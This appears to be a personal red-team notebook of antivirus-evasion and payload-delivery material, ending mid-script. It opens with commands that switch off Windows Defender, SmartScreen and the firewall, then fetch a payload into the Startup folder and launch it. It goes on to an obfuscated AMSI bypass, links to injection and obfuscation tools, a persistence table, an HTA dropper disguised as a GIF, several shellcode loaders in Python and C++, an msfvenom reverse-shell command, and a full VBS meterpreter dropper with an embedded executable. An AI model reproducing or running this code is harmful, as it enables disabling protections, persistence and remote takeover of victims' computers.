takeown /f "%systemroot%\System32\smartscreen.exe" /a
icacls "%systemroot%\System32\smartscreen.exe" /reset
taskkill /im smartscreen.exe /f
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
powershell.exe -command "Set-MpPreference -PUAProtection disable"
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
powershell.exe -command "netsh advfirewall set allprofiles state off"
cd %temp%
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe', '.\NSudo.exe') }
NSudo.exe -U:T -ShowWindowMode:Hide sc stop WinDefend
cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://direct-url/foryour-payload', '.\payload.exe') }
start payload.exe
SHELLcode
https://github.com/Gr1mmie/SharpShellCodeObfus
https://github.com/ChoiSG/UuidShellcodeExec
https://github.com/alphaSeclab/shellcode-resources
(https://github.com/specterops/at-ps/blob/master/Adversary%20Tactics%20-%20PowerShell.pdf)
PowerShell тактики уклонения
[DLL_reflect]
https://github.com/stephenfewer/ReflectiveDLLInjection
https://github.com/DarthTon/Blackbone Swiss army knife
https://github.com/dismantl/ImprovedReflectiveDLLInjection this one is very very cool
https://github.com/Professor-plum/Reflective-Driver-Loader very cool as well
https://github.com/countercept/doublepulsar-usermode-injector
https://github.com/azerton/dll_inject_test
https://github.com/ru-faraon/pupy
https://github.com/floomby/injector
https://github.com/amishsecurity/paythepony
https://github.com/BorjaMerino/Pazuzu
https://github.com/Frenda/libScanHook/blob/master/libScanHook/PeLoader.cpp
https://github.com/apriorit/ReflectiveDLLInjection
https://github.com/uItra/Injectora
https://github.com/fancycode/MemoryModule
https://github.com/mq1n/SonicInjector
Various tools:
https://github.com/CylanceVulnResearch/ReflectiveDLLRefresher
https://github.com/CylanceVulnResearch/upx/tree/reflective_dll
https://github.com/papadp/reflective-injection-detection
https://github.com/xorrior/WebCam_Dll
https://github.com/psmitty7373/eif
https://github.com/azerton/dll_inject_test
https://github.com/hirnschallsebastian/Breach
https://wikileaks.org/ciav7p1/cms/page_14588718.html
https://github.com/jaredhaight/ReflectCmd
https://www.codeproject.com/Articles/44326/MinHook-The-Minimalistic-x-x-API-Hooking-Libra
https://github.com/Jyang772/XOR_Crypter/tree/master/Stub
https://github.com/thereals0beit/RemoteFunctions
Documentation, blog posts and videos:
https://www.endgame.com/blog/technical-blog/hunting-memory
https://en.wikipedia.org/wiki/Portable_Executable
https://upload.wikimedia.org/wikipedia/commons/1/1b/Portable_Executable_32_bit_Structure_in_SVG_fixed.svg
http://stackoverflow.com/questions/18362368/loading-dlls-at-runtime-in-c-sharp
https://www.countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/
https://www.countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/
https://zerosum0x0.blogspot.dk/2017/04/doublepulsar-initial-smb-backdoor-ring.html
https://www.codeproject.com/Articles/20084/A-More-Complete-DLL-Injection-Solution-Using-Creat
http://blog.harmonysecurity.com/2008/10/new-paper-reflective-dll-injection.html
http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html
https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html
https://disman.tl/2015/03/16/cross-architecture-reflective-dll-inection.html
https://www.youtube.com/watch?v=9U6dtRtSuFo&index=11&list=PLcTmaBQIhUkgvwz3k-JGHUcDlS41fim0x
https://www.youtube.com/watch?v=9L9I1T5QDg
Interesting Microsoft documentation:
https://blogs.msdn.microsoft.com/ntdebugging/2009/01/09/challenges-of-debugging-optimized-x64-code/
https://msdn.microsoft.com/en-us/library/4khtbfyf
https://msdn.microsoft.com/en-us/library/69ze775t.aspx
PE2HTML
IPObfuscator
All Resource Collection Obfuscators
$a =[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$h="4456625220575263174452554847"
$s =[string](0..13|%{[char][int](53+($h).substring(($_*2),2))})-replace " "
$b =$a.GetField($s,'NonPublic,Static')
$b.SetValue($null,$true)
java obfuscator (GUI)
https://github.com/Ekultek/Graffiti
https://www.youtube.com/watch?v=xNhQMwC0BLo&feature=emb_logo
https://github.com/Ekultek/Graffiti
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Powershell_Fernet_Obfuscator
https://github.com/TheEyeOfCyber/FernHunt_WindowsPowershell-Obfuscator
SOURCE
Persistence techniques
Code | Technique | Mitre |
---|---|---|
PE-001 | Winlogon Helper DLL | T1004 |
PE-002 | Port Monitors | T1013 |
PE-003 | Accessibility Features | T1015 |
PE-004 | Shortcut Modification | T1023 |
PE-005 | Modify Existing Service | T1031 |
PE-006 | DLL Search Order Hijacking | T1038 |
PE-007 | Change Default File Association | T1042 |
PE-008 | New Service | T1050 |
PE-009 | Scheduled Tasks | T1053 |
PE-010 | Service Registry Permission Weakness | T1058 |
PE-011 | Registry Run Keys | T1060 |
PE-012 | WMI Event Subscription | T1084 |
PE-013 | Security Support Provider | T1101 |
PE-014 | AppInit DLLs | T1103 |
PE-015 | Component Object Model Hijacking | T1122 |
PE-016 | Netsh Helper DLL | T1128 |
PE-017 | Office Application Startup | T1137 |
PE-018 | Application Shimming | T1138 |
PE-019 | Screensaver | T1180 |
PE-020 | Image File Execution Options Injection | T1183 |
PE-021 | BITS Jobs | T1197 |
PE-022 | Time Providers | T1209 |
PE-023 | PowerShell Profile | T1504 |
PE-024 | Waitfor | N/A |
PE-025 | RID Hijacking | N/A |
Blogs
Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge
https://jhalon.github.io/utilizing-syscalls-in-csharp-1/
Tools
- https://github.com/rootm0s/Protectors
- https://github.com/XenocodeRCE/neo-ConfuserEx
Stealing Signatures ПОДПИСЬ
- https://github.com/secretsquirrel/SigThief
-
https://gist.github.com/r00t-3xp10it/88d4929fcded15fe22142426aa04a827
- https://github.com/cribdragg3r/Simple-Loader
B2E
- https://github.com/r00t-3xp10it/PandoraBox
- https://github.com/guillaC/xToBatConverter
EVIL GIF
<html>
<head>
<title>NazvanieGif</title>
<hta:application id="NazvanieGif"
border="thin"
borderstyle="complex"
maximizeButton="no"
minimizeButton="no"
/>
</head>
<script type="text/javascript">
var index = -1;
var images = [
"data:image/gif;base64, "];
function initGallery(){
window.resizeTo(300,300);
htaPayload();
nextPicture();
}
function nextPicture(){
var img;
index = index + 1;
if (index > images.length -1 ){
index = 0;
}
img = document.getElementById("gallery");
img.src = images[index];
}
function htaPayload(){
var payload="calc.exe";
try{
if (navigator.userAgent.indexOf("Windows") !== -1){
new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);
}
}
catch(e){
}
}
</script>
<style>
#gallery, div {
width: 100%;
height: 100%;
}
#outer {
text-align: center;
}
#inner{
display: inline-block;
}
body {
background-color: black;
}
</style>
<body onload="initGallery()">
<div id="outer">
<div id="inner">
<img id="gallery" onclick="nextPicture()">
</div>
</div>
</body>
</html>
Non-interactive Installation PYTHON
msiexec /i python<version>.msi
https://www.python.org/download/releases/2.5/msi/
c# Simple-Loader
# python2
import ctypes
payload = ""
shellcode = bytearray(payload)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
import ctypes
shellcode = ""
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
import ctypes
buf = ""
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
buf = c_char_p(buffer)
size = len(buffer)
addr = libc.valloc(size)
addr = c_void_p(addr)
if 0 == addr:
raise Exception("Failed to allocate memory")
memmove(addr, buf, size)
if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
raise Exception("Failed to set protection on buffer")
return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
if 1:
ctypes.windll.user32.ShowWindow(whnd, 0)
ctypes.windll.kernel32.CloseHandle(whnd)
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
buf,
ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
____________________________________________________________________________________________________________________
// C++
#include "stdio.h"
#include "windows.h"
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//运行不显示窗口
//shellcode
unsigned char buf[] = "";
void run(void* buffer) {
void(*function)();
function = (void (*)())buffer;
function();
}
void main()
{
LPVOID ptr = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(ptr, buf, sizeof(buf));
LPVOID ht = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&run, ptr, 0, NULL);
WaitForSingleObject(ht, -1);
}
____________________________________________________________________________________________________________________
#include "stdio.h"
#include "windows.h"
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/section:.data,RWE")
unsigned char buf[] = "";
void main()
{
__asm
{
mov eax, offset buf
jmp eax
}
}
____________________________________________________________________________________________________________________
//cobaltstrike
#include "stdio.h"
#include "windows.h"
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/section:.data,RWE")
unsigned char buf[] = "";
void run(void* buffer) {
void(*function)();
function = (void (*)())buffer;
function();
}
void main()
{
LPVOID heapp = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
void* ptr = HeapAlloc(heapp, 0, sizeof(buf));
RtlMoveMemory(ptr, buf, sizeof(buf));
LPVOID ht = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&run, ptr, 0, NULL);
WaitForSingleObject(ht, -1);
}
____________________________________________________________________________________________________________________
#include <Windows.h>
#include <stdio.h>
#include <intrin.h>
#define BUFF_SIZE 1024
char buf[] = "";
PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest");
BOOL RecvShellcode(VOID){
HANDLE hPipeClient;
DWORD dwWritten;
DWORD dwShellcodeSize = sizeof(buf);
WaitNamedPipe(ptsPipeName,NMPWAIT_WAIT_FOREVER);
hPipeClient = CreateFile(ptsPipeName,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING ,FILE_ATTRIBUTE_NORMAL,NULL);
if(hPipeClient == INVALID_HANDLE_VALUE){
printf("[+]Can't Open Pipe , Error : %d \n",GetLastError());
return FALSE;
}
WriteFile(hPipeClient,buf,dwShellcodeSize,&dwWritten,NULL);
if(dwWritten == dwShellcodeSize){
CloseHandle(hPipeClient);
printf("[+]Send Success ! Shellcode : %d Bytes\n",dwShellcodeSize);
return TRUE;
}
CloseHandle(hPipeClient);
return FALSE;
}
int wmain(int argc, TCHAR * argv[]){
HANDLE hPipe;
DWORD dwError;
CHAR szBuffer[BUFF_SIZE];
DWORD dwLen;
PCHAR pszShellcode = NULL;
DWORD dwOldProtect;
HANDLE hThread;
DWORD dwThreadId;
//:https://docs.microsoft.com/zh-cn/windows/win32/api/winbase/nf-winbase-createnamedpipea
hPipe = CreateNamedPipe(
ptsPipeName,
PIPE_ACCESS_INBOUND,
PIPE_TYPE_BYTE| PIPE_WAIT,
PIPE_UNLIMITED_INSTANCES,
BUFF_SIZE,
BUFF_SIZE,
0,
NULL);
if(hPipe == INVALID_HANDLE_VALUE){
dwError = GetLastError();
printf("[-]Create Pipe Error : %d \n",dwError);
return dwError;
}
CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)RecvShellcode,NULL,NULL,NULL);
if(ConnectNamedPipe(hPipe,NULL) > 0){
printf("[+]Client Connected...\n");
ReadFile(hPipe,szBuffer,BUFF_SIZE,&dwLen,NULL);
printf("[+]Get DATA Length : %d \n",dwLen);
pszShellcode = (PCHAR)VirtualAlloc(NULL,dwLen,MEM_COMMIT,PAGE_READWRITE);
CopyMemory(pszShellcode,szBuffer,dwLen);
for(DWORD i = 0;i< dwLen; i++){
Sleep(50);
_InterlockedXor8(pszShellcode+i,10);
}
VirtualProtect(pszShellcode,dwLen,PAGE_EXECUTE,&dwOldProtect);
// Shellcode
hThread = CreateThread(
NULL,
NULL,
(LPTHREAD_START_ROUTINE)pszShellcode,
NULL,
NULL,
&dwThreadId
);
WaitForSingleObject(hThread,INFINITE);
}
return 0;
}
https://github.com/sayhi2urmom/Antivirus_R3_bypass_demo
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security/defense-evasion/bypassing-windows-defender-one-tcp-socket-away-from-meterpreter-and-cobalt-strike-beacon.md
Execute metasploit vbs payload in cmd shell
If you are a pentester/researcher, you may want to gain a meterpreter session from a cmd shell at sometimes, ex: (sqlmap –os-shell, or other tools). Ex:
$ ncat -l -p 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\test\Desktop>ver
ver
Microsoft Windows XP [Version 5.1.2600]
C:\Documents and Settings\test\Desktop>
In the previous, you want try the following methods:
- a. translate exe into a batch script.
- b. download the payload file from remote server (ftp, tftp, http, ….)
- c. ….
Now, I’ll show you how to run metasploit payload in cmd.exe. Please try to think about the following questions:
- How to generate a payload with msfvenom ?
- How to run payload in a simple/compatible way ?
How to generate a payload with msfvenom ?
In order to test the payload on Windows XP/2003, we choose the vbs format . If you need help, please try [msfvenom -h]
$ msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.1.100 LPORT=4444 -f vbs --arch x86 --platform win
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of vbs file: 7370 bytes
Function oSpLpsWeU(XwXDDtdR)
urGQiYVn = "" & _
XwXDDtdR & ""
Set gFMdOBBiLZ = CreateObject("MSXML2.DOMDocument.3.0")
gFMdOBBiLZ.LoadXML(urGQiYVn)
oSpLpsWeU = gFMdOBBiLZ.selectsinglenode("B64DECODE").nodeTypedValue
set gFMdOBBiLZ = nothing
End Function
Function skbfzWOqR()
cTENSbYbnWY = "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"
Dim GBHMAfCsea
Set GBHMAfCsea = CreateObject("Scripting.FileSystemObject")
Dim nYosrMtHSIOKSTI
Dim LNXsqHXEKZQU
Set nYosrMtHSIOKSTI = GBHMAfCsea.GetSpecialFolder(2)
LNXsqHXEKZQU = nYosrMtHSIOKSTI & "\" & GBHMAfCsea.GetTempName()
GBHMAfCsea.CreateFolder(LNXsqHXEKZQU)
YeQZhbvaLPekFW = LNXsqHXEKZQU & "\" & "QoziwORKliqRDPs.exe"
Dim voFeIDpffjdo
Set voFeIDpffjdo = CreateObject("Wscript.Shell")
WwqoNcaCIbw = oSpLpsWeU(cTENSbYbnWY)
Set WQwWDbhse = CreateObject("ADODB.Stream")
WQwWDbhse.Type = 1
WQwWDbhse.Open
WQwWDbhse.Write WwqoNcaCIbw
WQwWDbhse.SaveToFile YeQZhbvaLPekFW, 2
voFeIDpffjdo.run YeQZhbvaLPekFW, 0, true
GBHMAfCsea.DeleteFile(YeQZhbvaLPekFW)
GBHMAfCsea.DeleteFolder(LNXsqHXEKZQU)
End Function
skbfzWOqR
How to run payload in a simple/compatible way ?
Read the code, we can create a simple vbs script called msf.vbs to execute the shellcode. A vbs script can be executed on Windows XP/2003/Vista/7/8/10/2008/2012/….
shellcode = WScript.Arguments.Item(0)
strXML = "" & shellcode & ""
Set oXMLDoc = CreateObject("MSXML2.DOMDocument.3.0")
